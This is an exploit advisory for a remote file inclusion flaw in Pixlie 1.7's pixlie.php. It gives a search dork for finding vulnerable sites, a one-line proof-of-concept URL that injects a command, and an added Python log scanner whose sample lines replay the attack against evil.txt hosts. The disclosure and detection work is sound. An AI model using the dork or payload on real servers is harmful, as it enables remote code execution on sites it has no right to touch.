Pixlie version 1.7 suffers from a remote file inclusion vulnerability in pixlie.php.
26ea74cb61d1341d7b4eb4b01ac2598bb9f382ba7243c70fde73c3ed446f41b2
Pixlie 1.7 Remote Command Execution Vulnerability
-----------------------------------------------------------------------
Script : Pixlie 1.7
Version : 1.7
Site : https://www.pixlie.de/download.php
Founder : Rizgar
Contact : rizgar@linuxmail.org and irc.gigachat.net #kurdhack
Thanks : Kurdish Hackers Clan (Anti Fascist Group :P), PH (HERO), ColdHackers (nice boys)
d0rk : "Pixlie - die kostenlose Bildergalerie"
-----------------------------------------------------------------------
Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of Pixlie 1.7. Complete in the system application not work.
Solution :
* register_globals = off
* Wait for a new release.
------------------------------------------------------------------------
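Look at pixlie.php: the assignment to $root is commented out, so with register_globals on the variable can be set from the request: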
//$root = "/home/www/IhrBenutzer/html";
PoC :
https://www.example.com/pixlie.php?root=evil.txt?&cmd=id
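
Detection, as an added example that is not part of the original advisory: a Python check that scans web server access logs for requests to pixlie.php that supply a root parameter, which legitimate clients never send. The combined log format, the sample lines and the dir/page parameters are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Client, request target and status from a combined-format access log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
# A value that starts with a URL scheme or PHP stream wrapper.
WRAPPER_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)

def classify(line):
    """Return (client, status, kind, value) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/pixlie.php"):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # PHP variable names are case-sensitive; root[x]=... also sets $root.
        if name.split("[", 1)[0] != "root":
            continue
        value = unquote(value)  # second decode catches double-encoded values
        if WRAPPER_RE.match(value):
            kind = "remote-wrapper"
        elif ".." in value:
            kind = "traversal"
        else:
            kind = "override"  # any client-supplied root is unexpected
        return client, int(status), kind, value
    return None

def scan(lines):
    """Classify every line and keep only the suspicious ones."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation IP ranges, hypothetical parameters).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /pixlie.php?root=evil.txt?&cmd=id HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /gallery/pixlie.php?root=http%3A%2F%2Fhost.example%2Fevil.txt HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /pixlie.php?dir=holiday&page=2 HTTP/1.1" 200 2048',
    '192.0.2.11 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?root=1 HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for client, status, kind, value in scan(SAMPLE_LOG):
        print(f"{client} status={status} {kind}: root={value!r}")
```

register_globals also registers POST and cookie values, which a standard access log does not record, so a clean scan does not rule out attempts through those channels.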